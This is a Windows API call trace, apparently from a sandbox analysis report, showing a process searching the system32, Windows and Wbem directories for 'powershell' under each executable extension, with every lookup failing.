	[0337.697] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.697] SetErrorMode (uMode=0x1) returned 0x1
	[0337.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.698] SetErrorMode (uMode=0x1) returned 0x1
	[0337.698] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.698] SetErrorMode (uMode=0x1) returned 0x1
	[0337.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.698] SetErrorMode (uMode=0x1) returned 0x1
	[0337.698] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.699] SetErrorMode (uMode=0x1) returned 0x1
	[0337.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.699] SetErrorMode (uMode=0x1) returned 0x1
	[0337.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.699] SetErrorMode (uMode=0x1) returned 0x1
	[0337.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.700] SetErrorMode (uMode=0x1) returned 0x1
	[0337.700] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.700] SetErrorMode (uMode=0x1) returned 0x1
	[0337.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.700] SetErrorMode (uMode=0x1) returned 0x1
	[0337.700] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.701] SetErrorMode (uMode=0x1) returned 0x1
	[0337.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.701] SetErrorMode (uMode=0x1) returned 0x1
	[0337.701] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.701] SetErrorMode (uMode=0x1) returned 0x1
	[0337.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.702] SetErrorMode (uMode=0x1) returned 0x1
	[0337.702] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.702] SetErrorMode (uMode=0x1) returned 0x1
	[0337.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.702] SetErrorMode (uMode=0x1) returned 0x1
	[0337.702] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.702] SetErrorMode (uMode=0x1) returned 0x1
	[0337.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.703] SetErrorMode (uMode=0x1) returned 0x1
	[0337.703] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.703] SetErrorMode (uMode=0x1) returned 0x1
	[0337.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.703] SetErrorMode (uMode=0x1) returned 0x1
	[0337.703] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.704] SetErrorMode (uMode=0x1) returned 0x1
	[0337.704] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.704] SetErrorMode (uMode=0x1) returned 0x1
	[0337.704] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.704] SetErrorMode (uMode=0x1) returned 0x1
	[0337.704] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.705] SetErrorMode (uMode=0x1) returned 0x1
	[0337.705] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.705] SetErrorMode (uMode=0x1) returned 0x1
	[0337.705] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.705] SetErrorMode (uMode=0x1) returned 0x1
	[0337.705] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.706] SetErrorMode (uMode=0x1) returned 0x1
	[0337.706] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.706] SetErrorMode (uMode=0x1) returned 0x1
	[0337.706] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.706] SetErrorMode (uMode=0x1) returned 0x1
	[0337.706] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.706] SetErrorMode (uMode=0x1) returned 0x1
	[0337.707] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.707] SetErrorMode (uMode=0x1) returned 0x1
	[0337.707] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.707] SetErrorMode (uMode=0x1) returned 0x1
	[0337.707] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.707] SetErrorMode (uMode=0x1) returned 0x1
	[0337.708] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.708] SetErrorMode (uMode=0x1) returned 0x1
	[0337.708] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.708] SetErrorMode (uMode=0x1) returned 0x1
	[0337.708] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.708] SetErrorMode (uMode=0x1) returned 0x1
	[0337.708] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.709] SetErrorMode (uMode=0x1) returned 0x1
	[0337.709] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.709] SetErrorMode (uMode=0x1) returned 0x1
	[0337.709] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.709] SetErrorMode (uMode=0x1) returned 0x1
	[0337.710] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.710] SetErrorMode (uMode=0x1) returned 0x1
	[0337.710] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.710] SetErrorMode (uMode=0x1) returned 0x1
	[0337.710] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.710] SetErrorMode (uMode=0x1) returned 0x1
	[0337.710] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.711] SetErrorMode (uMode=0x1) returned 0x1
	[0337.711] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.711] SetErrorMode (uMode=0x1) returned 0x1
	[0337.711] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.711] SetErrorMode (uMode=0x1) returned 0x1
	[0337.711] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.712] SetErrorMode (uMode=0x1) returned 0x1
	[0337.712] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.712] SetErrorMode (uMode=0x1) returned 0x1
	[0337.712] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.712] SetErrorMode (uMode=0x1) returned 0x1
	[0337.712] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.713] SetErrorMode (uMode=0x1) returned 0x1
	[0337.713] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0337.713] SetErrorMode (uMode=0x1) returned 0x1
	[0337.713] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.713] SetErrorMode (uMode=0x1) returned 0x1
	[0337.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.714] SetErrorMode (uMode=0x1) returned 0x1
	[0337.714] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.714] SetErrorMode (uMode=0x1) returned 0x1
	[0337.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.714] SetErrorMode (uMode=0x1) returned 0x1
	[0337.714] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.715] SetErrorMode (uMode=0x1) returned 0x1
	[0337.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.715] SetErrorMode (uMode=0x1) returned 0x1
	[0337.715] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.715] SetErrorMode (uMode=0x1) returned 0x1
	[0337.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.715] SetErrorMode (uMode=0x1) returned 0x1
	[0337.715] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.716] SetErrorMode (uMode=0x1) returned 0x1
	[0337.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.716] SetErrorMode (uMode=0x1) returned 0x1
	[0337.716] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.716] SetErrorMode (uMode=0x1) returned 0x1
	[0337.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.717] SetErrorMode (uMode=0x1) returned 0x1
